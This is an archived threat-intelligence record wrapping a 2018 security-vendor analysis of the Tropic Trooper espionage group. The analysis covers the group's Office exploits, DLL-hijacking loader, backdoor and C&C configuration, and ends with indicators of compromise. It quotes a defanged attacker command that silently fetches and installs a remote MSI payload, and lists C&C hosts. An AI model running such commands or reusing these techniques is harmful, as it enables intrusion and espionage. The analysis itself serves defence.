{
	"id": "cfda91f2-8dd2-46c9-b96c-3d5dcc9cab28",
	"created_at": "2026-04-06T00:15:01.817523Z",
	"updated_at": "2026-04-10T03:33:20.01381Z",
	"deleted_at": null,
	"sha1_hash": "528d8f38f83904dc5732ed358917cb599d26a8d5",
	"title": "Tropic Trooper’s New Strategy",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 90526,
	"plain_text": "Tropic Trooper’s New Strategy\r\nPublished: 2018-03-14 · Archived: 2026-04-02 11:10:04 UTC\r\nTropic Troopernews article (also known as KeyBoy) levels its campaigns against Taiwanese, Philippine, and Hong\r\nKong targets, focusing on their government, healthcare, transportation, and high-tech industries. Its operators are\r\nbelieved to be very organized and develop their own cyberespionage tools that they fine-tuned in their recent\r\ncampaigns. Many of the tools they use now feature new behaviors, including a change in the way they maintain a\r\nfoothold in the targeted network.\r\nAttack Chain\r\nintelFigure 1. Attack chain of Tropic Trooper’s operations\r\nHere’s a summary of the attack chain of Tropic Trooper’s recent campaigns:\r\n1. Execute a command through exploits for CVE-2017-11882 or CVE-2018-0802, security flaws in Microsoft\r\nOffice’s Equation Editor (EQNEDT32.EXE).\r\n2. Download an installer package (.msi) and install it on the system by executing the command: /c msiexec /q\r\n/i [hxxp://61[.]216[.]5[.]24/in.sys]).\r\n3. This system configuration file (in.sys) will drop a backdoor installer (UserInstall.exe) then delete itself.\r\nThe backdoor installer will drop a normal sidebar.exe file (a Windows Gadget tool, a feature already\r\ndiscontinued by Windows), a malicious loader (in \"C:\\ProgramData\\Apple\\Update\\wab32res.dll\"), and an\r\nencrypted configuration file. UserInstall.exe will abuse the BITSadmin command-line tool to create a job\r\nand launch sidebar.exe.\r\n4. The malicious loader will use dynamic-link library (DLL) hijacking — injecting malicious code into a\r\nprocess of a file/application — on sidebar.exe and launch dllhost.exe (a normal file). The loader will then\r\ninject a DLL backdoor into dllhost.exe.\r\nWe also observed malicious documents that don’t need to download anything from the internet as the backdoor’s\r\ndropper is already embedded in the document. This, however, doesn’t influence the overall result for the victim.\r\nThe backdoor will load the encrypted configuration file and decrypt it, then use Secure Sockets Layer (SSL)\r\nprotocol to connect to command-and-control (C\u0026C) servers.\r\nTropic Trooper uses exploit-laden Microsoft Office documents to deliver malware to targets. These documents use\r\njob vacancies in organizations that may be deemed socio-politically sensitive to recipients. Below is a screenshot\r\nof the document used in their latest campaigns:\r\nintelFigure 2. Malicious document used by Tropic Trooper\r\nPDB Strings as Context Clues\r\nThe MSI file has two program database (PDB) strings inside: one belonging to the MSI file, and another for the\r\nbackdoor installer (detected by Trend Micro as TROJ_TCDROP.ZTFB).\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/\r\nPage 1 of 5\n\nintelFigure 3. PDB strings inside the MSI file\r\nThe first PDB string has a certain ss2/Projects/MsiWrapper (Project MsiWrapper) in it, which we found to be an\r\nopen-source application that converts executable setup programs to MSI files. The second PDB string contains\r\nWork, House, and TSSL: we can assume this tool belongs to Tropic Trooper’s TSSL project as seen by other\r\nresearchers. Here it is a new one, as seen in their misspelling of “Horse” to “House” (other reports had the string\r\ntyped correctly).\r\nAnother interesting PDB string we found is -\r\n D:\\Work\\Project\\VS\\house\\Apple\\Apple_20180115\\Release\\InstallClient.pdb. At installation, the MSI file drops\r\nthree files and creates one hidden directory (UFile) into C:\\ProgramData\\Apple\\Update\\, likely as a ruse.\r\nIt would then use sidebar.exe to load the malicious wab32res.dll (TROJ_TCLT.ZDFB) through DLL hijacking.\r\nThis is carried out to evade antivirus (AV) detection, because wab32res.dll is loaded by a benign file.\r\nintelFigure 4. The installer drops three files into the Apple/Update directory\r\nintelFigure 5. PDB strings inside the loader file\r\nFrom the PDB string above, the attackers intended it to be a loader (hence the name FakeRun) and not the actual\r\nbackdoor. FakeRun’s PDB string (D:\\Work\\Project\\VS\\house\\Apple\\Apple_20180115\\Release\\FakeRun.pdb)\r\nindicates the loader will execute dllhost.exe and inject one malicious DLL file, which is the backdoor, into this\r\nprocess. The backdoor, TClient (BKDR_TCLT.ZDFB), is so named from its own PDB string.\r\nintelFigure 6. TClient is injected into dllhost.exe\r\nMalware Analysis \r\nwab32res.dll (FakeRun loader) loads TClient. Once the loader is executed, it will check the current process\r\n(sidebar.exe) whether to load it or not. Successfully checking the loader will execute the dllhost.exe process and\r\ncreate a hardcode mutex to avoid injecting it into the wrong dllhost.exe, as there can be multiple instances of it\r\ndepending on the number of programs using the Internet Information Services.\r\nintelFigure 7. The loader checking the sidebar process\r\nintelFigure 8. The malicious loader injecting the backdoor into dllhost.exe\r\nintelFigure 9. Comparison of TClient’s configuration format in 2016 (left, from other researchers) and 2018\r\n(right)\r\nTClient will use SSL to connect to Tropic Trooper’s C\u0026C server. However, the C\u0026C server and some\r\nconfiguration values are not hardcoded in the backdoor. This allows Tropic Trooper’s operators to easily\r\nchange/update the C\u0026C server and configure other values.\r\nTClient is actually one of Tropic Trooper’s other backdoors. The backdoor noted by other security researchers was\r\nencoded with different algorithms and configured with different parameter names in 2016, for instance. TClient\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/\r\nPage 2 of 5\n\nuses symmetric encryption to decrypt its configuration with one 16-byte key in 2018. The image and table below\r\nillustrate TClient’s encrypted configuration that we decrypted (via Python code):\r\nintel\r\nFigure 10. Snapshot of code we used to decrypt TClient’s configuration\r\nintelFigure 11. Encrypted backdoor configuration\r\nDescription Decryption Strings\r\nCheck code MDDEFGEGETGIZ\r\nAddr1: tel.qpoe[.]com\r\nAddr2: elderscrolls.wikaba[.]com\r\nAddr3: tel.qpoe[.]com\r\nPort1: 443\r\nPort2: 443\r\nPort3: 53\r\nLoginPasswd: someone\r\nHostMark: mark\r\nProxy: 0\r\nFigure 12. Decrypted backdoor configuration\r\nReverse analysis of TClient allowed us to determine how to decrypt the C\u0026C information. TClient will use\r\ncustom SSL libraries to connect the C\u0026C server. We also found another SSL certificate on this C\u0026C server. A\r\ncloser look reveals that it was registered quite recently, and is set to expire after a year, suggesting Tropic\r\nTrooper’s use or abuse of components or services that elapse so they can leave as few traces as possible.\r\nintelFigure 13. SSL certificate’s validity\r\nFollowing Tropic Trooper’s Trails\r\nWe further monitored their activities and found three additional and notable PDB strings in their malware:\r\nD:\\Work\\Project\\VS\\HSSL\\HSSL_Unicode _2\\Release\\ServiceClient.pdb\r\nD:\\Work\\VS\\Horse\\TSSL\\TSSL_v3.0\\TClient\\Release\\TClient.pdb\r\nD:\\Work\\VS\\Horse\\TSSL\\TSSL_v0.3.1_20170722\\TClient\\x64\\Release\\TClient.pdb\r\nThese came from open-intelligence platforms and incident response cases. These strings shed further light on\r\nTropic Trooper’s operations:\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/\r\nPage 3 of 5\n\nThey have another campaign/project named HSSL, which supports Unicode characters.\r\nThe TSSL project has a v3.0 version, indicating the operators can mix and match different versions of their\r\nmalware, depending on their target.\r\nThe TSSL project has 64-bit version.\r\nThe Need for a Proactive Incident Response Strategy\r\nCyberespionage campaigns are persistent and, as shown by Tropic Trooper, always raring to exploit weaknesses in\r\npeople and technology. For organizations, this highlights the significance of staying ahead of their attackers:\r\ndetect, analyze, and respond. What techniques will they use? How can my organization’s attack surface be\r\nreduced? What did I do to respond to the threat — what worked, what didn’t, and what could be fine-tuned?\r\nA proactive incident response strategy provides threat intelligence — from the endpoint to the network — that can\r\nlet IT/system administrators identify malicious activities that aren’t typically visible to traditional security\r\nsolutions.\r\nTClient, for instance, uses DLL hijacking and injection that may not be as noticeable to others. Its use of the SSL\r\nprotocol also means it can blend with legitimate traffic. Analyzing their PDB strings can also provide a deeper\r\ninsight into the campaign’s bigger picture. Ascertaining the tactics and techniques they use empower organizations\r\nin developing robust and actionable indicators of compromise (IoCs) that can act as benchmarks for response.\r\nHere are some best practices that organizations can adopt:\r\nKeep the system, its applications, and the network updated. The vulnerabilities that Tropic Trooper’s\r\ncampaigns have been patched last January, for instance. Enforce a stronger patch managementnews article\r\npolicy, and consider virtual patching for legacy systems.\r\nEnforce the principle of least privilege: Employ network segmentationnews article and data\r\ncategorizationnews article to deter lateral movement and mitigate further exposure. Application control and\r\nbehavior monitoring block suspicious files and anomalous routines from being installed or executed in the\r\nsystem.\r\nDisable or secure the use of system administration toolsnews- cybercrime-and-digital-threats such as\r\nPowerShellnews article and other command-line toolsnews article that may be abused.\r\nActively monitor your perimeter, from gateways and endpoints to networks and servers. Firewalls as well\r\nas intrusion detection and prevention systemsproducts help thwart network-based attacks.\r\nNurture a culture of cybersecurity. Spear-phishing emails, for instance, rely on baiting targets with socially\r\nengineered documents. The technologies that help protect the organization are only as good as the people\r\nwho use them.\r\nIndicators of Compromise (IoCs)\r\nRelated Hashes (SHA-256): Detected as CVE-2018-0802.ZTFC:\r\n1d128fd61c2c121d9f2e1628630833172427e5d486cdd4b6d567b7bdac13935e\r\nBKDR_TCLT.ZDFB:\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/\r\nPage 4 of 5\n\n01087051f41df7bb030256c97497f69bc5b5551829da81b8db3f46ba622d8a69\r\nBKDR64_TCLT.ZTFB:\r\n6e900e5b6dc4f21a004c5b5908c81f055db0d7026b3c5e105708586f85d3e334\r\nTROJ_SCLT.ZTFB:\r\n49df4fec76a0ffaee5e4d933a734126c1a7b32d1c9cb5ab22a868e8bfc653245\r\nTROJ_TCDROP.ZTFB:\r\nb0f120b11f727f197353bc2c98d606ed08a06f14a1c012d3db6fe0a812df528a\r\nd65f809f7684b28a6fa2d9397582f350318027999be3acf1241ff44d4df36a3a\r\n85d32cb3ae046a38254b953a00b37bb87047ec435edb0ce359a867447ee30f8b\r\nTROJ_TCLT.ZDFB:\r\n02281e26e89b61d84e2df66a0eeb729c5babd94607b1422505cd388843dd5456\r\nfb9c9cbf6925de8c7b6ce8e7a8d5290e628be0b82a58f3e968426c0f734f38f6\r\nURLs related to C\u0026C communication:\r\nqpoe[.]com\r\nwikaba[.]com\r\ntibetnews[.]today\r\ndns-stuff[.]com\r\n2waky[.]com\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
	],
	"report_names": [
		"tropic-trooper-new-strategy"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "61ea51ed-a419-4b05-9241-5ab0dbba25fc",
			"created_at": "2023-01-06T13:46:38.354607Z",
			"updated_at": "2026-04-10T02:00:02.939761Z",
			"deleted_at": null,
			"main_name": "APT23",
			"aliases": [
				"BRONZE HOBART",
				"G0081",
				"Red Orthrus",
				"Earth Centaur",
				"PIRATE PANDA",
				"KeyBoy",
				"Tropic Trooper"
			],
			"source_name": "MISPGALAXY:APT23",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bef7800a-a08f-4e21-b65c-4279c851e572",
			"created_at": "2022-10-25T15:50:23.409336Z",
			"updated_at": "2026-04-10T02:00:05.319608Z",
			"deleted_at": null,
			"main_name": "Tropic Trooper",
			"aliases": [
				"Tropic Trooper",
				"Pirate Panda",
				"KeyBoy"
			],
			"source_name": "MITRE:Tropic Trooper",
			"tools": [
				"USBferry",
				"ShadowPad",
				"PoisonIvy",
				"BITSAdmin",
				"YAHOYAH",
				"KeyBoy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "578f8e62-2bb4-4ce4-a8b7-6c868fa29724",
			"created_at": "2022-10-25T16:07:24.344358Z",
			"updated_at": "2026-04-10T02:00:04.947834Z",
			"deleted_at": null,
			"main_name": "Tropic Trooper",
			"aliases": [
				"APT 23",
				"Bronze Hobart",
				"Earth Centaur",
				"G0081",
				"KeyBoy",
				"Operation Tropic Trooper",
				"Pirate Panda",
				"Tropic Trooper"
			],
			"source_name": "ETDA:Tropic Trooper",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"ByPassGodzilla",
				"CHINACHOPPER",
				"CREDRIVER",
				"China Chopper",
				"Chymine",
				"Darkmoon",
				"Gen:Trojan.Heur.PT",
				"KeyBoy",
				"Neo-reGeorg",
				"PCShare",
				"POISONPLUG.SHADOW",
				"Poison Ivy",
				"RoyalRoad",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Swor",
				"TSSL",
				"USBferry",
				"W32/Seeav",
				"Winsloader",
				"XShellGhost",
				"Yahoyah",
				"fscan",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "86182dd7-646c-49c5-91a6-4b62fd2119a7",
			"created_at": "2025-08-07T02:03:24.617638Z",
			"updated_at": "2026-04-10T02:00:03.738499Z",
			"deleted_at": null,
			"main_name": "BRONZE HOBART",
			"aliases": [
				"APT23",
				"Earth Centaur ",
				"KeyBoy ",
				"Pirate Panda ",
				"Red Orthrus ",
				"TA413 ",
				"Tropic Trooper "
			],
			"source_name": "Secureworks:BRONZE HOBART",
			"tools": [
				"Crowdoor",
				"DSNGInstaller",
				"KeyBoy",
				"LOWZERO",
				"Mofu",
				"Pfine",
				"Sepulcher",
				"Xiangoop Loader",
				"Yahaoyah"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434501,
	"ts_updated_at": 1775792000,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/528d8f38f83904dc5732ed358917cb599d26a8d5.pdf",
		"text": "https://archive.orkl.eu/528d8f38f83904dc5732ed358917cb599d26a8d5.txt",
		"img": "https://archive.orkl.eu/528d8f38f83904dc5732ed358917cb599d26a8d5.jpg"
	}
}